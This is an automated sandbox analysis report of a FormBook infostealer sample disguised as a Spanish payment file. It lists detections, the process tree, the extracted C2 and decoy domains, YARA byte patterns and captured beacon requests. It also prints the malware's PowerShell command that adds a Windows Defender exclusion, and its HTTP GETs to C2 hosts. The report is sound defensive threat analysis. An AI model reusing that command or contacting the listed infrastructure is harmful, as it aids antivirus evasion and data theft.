Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pago pendiente.exe

Overview

General Information

Sample name:Pago pendiente.exe
Analysis ID:1430321
MD5:9a308e1ea62b7ede8876e433178957d1
SHA1:dac00f0068f3f97a71faf15577ce0c7d855ff691
SHA256:ae300b28b2240d11d01e9066a26a88349258d4016c41460604c9ff5bb64c9b6d
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Pago pendiente.exe (PID: 5824 cmdline: "C:\Users\user\Desktop\Pago pendiente.exe" MD5: 9A308E1EA62B7EDE8876E433178957D1)
    • powershell.exe (PID: 5080 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • control.exe (PID: 1644 cmdline: "C:\Windows\SysWOW64\control.exe" MD5: EBC29AA32C57A54018089CFC9CACAFE8)
          • cmd.exe (PID: 4832 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.RegSvcs.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a49:$sqlite3step: 68 34 1C 7B E1
          • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a78:$sqlite3text: 68 38 2A 90 C5
          • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Pago pendiente.exe", ParentImage: C:\Users\user\Desktop\Pago pendiente.exe, ParentProcessId: 5824, ParentProcessName: Pago pendiente.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Pago pendiente.exe", ProcessId: 5080, ProcessName: powershell.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.urxetqt.com/gs12/www.hjgd.xyzAvira URL Cloud: Label: phishing
          Source: http://www.urxetqt.comAvira URL Cloud: Label: phishing
          Source: http://www.urxetqt.com/gs12/Avira URL Cloud: Label: phishing
          Found malware configuration
          Source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lolabeautystudios.com/gs12/"], "decoy": ["juniavilela.com", "italiahealth.club", "freefoodpro.com", "qqmotor.co", "mosahacatering.com", "wocc.club", "tourly360.com", "airzf.com", "eternalknot1008.com", "pons.cc", "zdryueva.com", "bodution.website", "vip8g100013.top", "3box.club", "bestoffersinoneplace.com", "tronbank.club", "hlysh.live", "allfireofferapp.sbs", "goldenvistaservices.com", "theconfidencebl-youprint.com", "doping.digital", "urxetqt.com", "utahdatecoach.com", "coworkingvalencia.pro", "thebeautybarandco.com", "umastyle.club", "demandstudiosnews.com", "k2securityhn.com", "teacakesandtadpoles.com", "epacksystems.network", "y2llvq.vip", "udin88b.us", "simonettipressurewashing.com", "baansbliss.com", "messyplayclub.com", "panaco.co", "kustomequipment.com", "actnowgreen.com", "tallawahyouthfoundation.com", "novistashop.com", "oversight418354.email", "ypsom.info", "enerableoffi.club", "otirugkyt.com", "mappedbyamanda.com", "vibelola.com", "nexelab.com", "zgcple.info", "maiores-veritatis.com", "wonderdread.cloud", "signomo.com", "uspsdirect.shop", "finessebuilding.com", "heavydutywearpart.com", "51win.ink", "b-a-s-e.net", "xianqianjin.fun", "domscott.art", "rtp-tambakslot5000.site", "sports565.com", "kpi-finder.com", "taylor.capital", "1993520.xyz", "hjgd.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: Pago pendiente.exeReversingLabs: Detection: 23%
          Yara detected FormBook
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4f1f2f8.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Pago pendiente.exe.4eaf4d8.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.4443703751.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443748619.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.0000000004DCF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2011441165.00000000044AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.4443338371.00000000025A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: Pago pendiente.exeJoe Sandbox ML: detected
          Source: Pago pendiente.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Pago pendiente.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000007.00000002.4443991237.00000000047B0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2075562332.00000000045FF000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000007.00000002.4443991237.000000000494E000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000007.00000003.2072079557.000000000444B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: RegSvcs.exe, 00000005.00000002.2072131724.0000000000FA7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000005.00000002.2072038092.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443192720.0000000000060000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 00000006.00000002.4459657953.0000000010E7F000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4444528823.0000000004CFF000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000007.00000002.4443405031.000000000282B000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop esi5_2_00417322
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi5_2_00416CF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then pop edi5_2_00417D70
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop esi7_2_025B7322
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi7_2_025B6CF0
          Source: C:\Windows\SysWOW64\control.exeCode function: 4x nop then pop edi7_2_025B7D70

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 103.224.212.216 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lolabeautystudios.com/gs12/
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1Host: www.tronbank.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1Host: www.signomo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1Host: www.k2securityhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox ViewIP Address: 103.224.212.216 103.224.212.216
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exeCode function: 6_2_0E4CEF82 getaddrinfo,setsockopt,recv,6_2_0E4CEF82
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=l5+ohMyXvfUY1BXURi/VBBPK89EwzQ1xmTW49ppdAXwminvYBxYYysXiCF4Xd1c73Byq&vT=LtxxLba HTTP/1.1Host: www.tronbank.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=sKMZ9JWmyHzsFnuZp0fZtWbmtlVDzCM4ZbYLfRKv+HtPtGiIGUjdRyYwPYcfKf7QGcOF&vT=LtxxLba HTTP/1.1Host: www.signomo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba HTTP/1.1Host: www.airzf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /gs12/?4h0=q59tBajeIo68CyAO1CDG6iJlXnRVkR/RpgQvK7vE3BQj9j+5I7CNTMK9jJbO36qf2KSo&vT=LtxxLba HTTP/1.1Host: www.k2securityhn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.tronbank.club
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000006.00000002.4443289671.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2011068724.0000000000F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000006.00000000.2026275554.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2026275554.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.0000000009AF9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000006.00000000.2026275554.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4448347462.00000000099C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000006.00000000.2024943669.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447767327.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4447077896.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: Pago pendiente.exe, 00000000.00000002.2008580882.00000000034E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Pago pendiente.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.ink/gs12/ch_cf
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.51win.inkReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.com/gs12/www.udin88b.us
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.actnowgreen.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.com/gs12/www.actnowgreen.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.airzf.comReferer:
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com
          Source: explorer.exe, 00000006.00000002.4454283275.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.eternalknot1008.com/gs12/
